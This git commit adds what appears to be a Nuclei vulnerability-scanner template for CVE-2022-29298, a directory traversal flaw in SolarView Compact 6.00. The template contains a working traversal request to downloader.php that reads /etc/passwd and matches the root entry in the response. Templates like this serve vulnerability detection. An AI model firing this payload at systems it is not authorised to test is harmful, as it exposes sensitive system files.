Create CVE-2022-29298.yaml

2022-07-06 22:07:41 +05:30 · 2022-07-06 22:07:41 +05:30 · 803e22fdb6
parent 4128f7f554
commit 803e22fdb6
1 changed files with 28 additions and 0 deletions
--- a/cves/2022/CVE-2022-29298.yaml
+++ b/cves/2022/CVE-2022-29298.yaml
@ -0,0 +1,28 @@
+id: CVE-2022-29298
+
+info:
+  name: SolarView Compact 6.00 - Directory Traversal
+  author: ritikchaddha
+  severity: high
+  description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal.
+  reference:
+    - https://www.exploit-db.com/exploits/50950
+    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29298
+  tags: cve,cve2022,lfi,solarview
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+
+      - type: status
+        status:
+          - 200